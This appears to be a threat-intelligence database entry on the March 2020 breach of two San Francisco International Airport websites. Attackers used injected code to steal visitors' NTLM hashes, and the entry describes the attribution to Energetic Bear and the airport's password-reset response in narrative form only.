Cyber Incident Victim: San Francisco International Airport
Date:
Mar 2020
Location:
United States of America
Summary
San Francisco International Airport experienced a cyberattack targeting two employee and contractor websites, where hackers deployed malicious code exploiting an Internet Explorer vulnerability to harvest visitors' Windows login credentials via NTLM hashes. The incident was attributed to the Russian state-sponsored group Energetic Bear, known for expanding from energy sector attacks to aviation, using established tactics like abusing SMB features and file:// prefixes to facilitate lateral network movement for potential reconnaissance or sabotage. The airport mitigated risks by resetting all employee passwords and advising affected users to change their Windows credentials, though no evidence suggested broader compromises beyond the initial breach.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In March 2020, San Francisco International Airport experienced a cybersecurity incident involving the compromise of two websites: SFOConnect.com, used by airport employees, and SFOConstruction.com, a portal for construction contractors. Attackers breached both sites and inserted malicious code designed to exploit an Internet Explorer vulnerability, specifically targeting visitors' Windows credentials through the theft of NTLM hashes. These hashes, if cracked, could reveal users' Windows passwords, potentially enabling unauthorized access to the airport's internal network. The attack methodology involved exploiting an SMB feature and leveraging the file:// prefix to harvest credentials, a technique previously documented in watering hole campaigns. Security firm ESET attributed the activity to Energetic Bear (also known as DragonFly), a Russian state-sponsored hacking group active since 2010. The group had historically targeted energy sector organizations but expanded operations to include aviation infrastructure in this incident. ESET researcher Matthieu Faou confirmed the tactics aligned with Energetic Bear's known patterns, including the use of compromised websites to distribute credential-stealing payloads. While the attackers successfully exfiltrated NTLM hashes, there was no evidence they progressed beyond credential theft to lateral movement or data exfiltration within the airport's network.
The airport publicly disclosed the breach via a data breach notification and initiated password resets for all employee accounts as a containment measure. Affected users were advised to reset their Windows passwords to invalidate any potentially compromised credentials. This action effectively mitigated the risk posed by stolen NTLM hashes, as password changes render previously captured hashes unusable. ESET noted no corroborating evidence of similar attacks against other airports at the time, though the group had previously compromised media websites in Eastern Europe using identical techniques. Energetic Bear's targeting of critical infrastructure entities underscored the persistent threat posed by state-sponsored actors to transportation and energy sectors globally. The incident highlighted the operational risks associated with web-based services in organizational ecosystems, particularly when vulnerabilities in legacy browsers like Internet Explorer remain unpatched. San Francisco International Airport's response focused on credential rotation and public transparency, with no reported disruptions to flight operations or additional downstream impacts from the breach.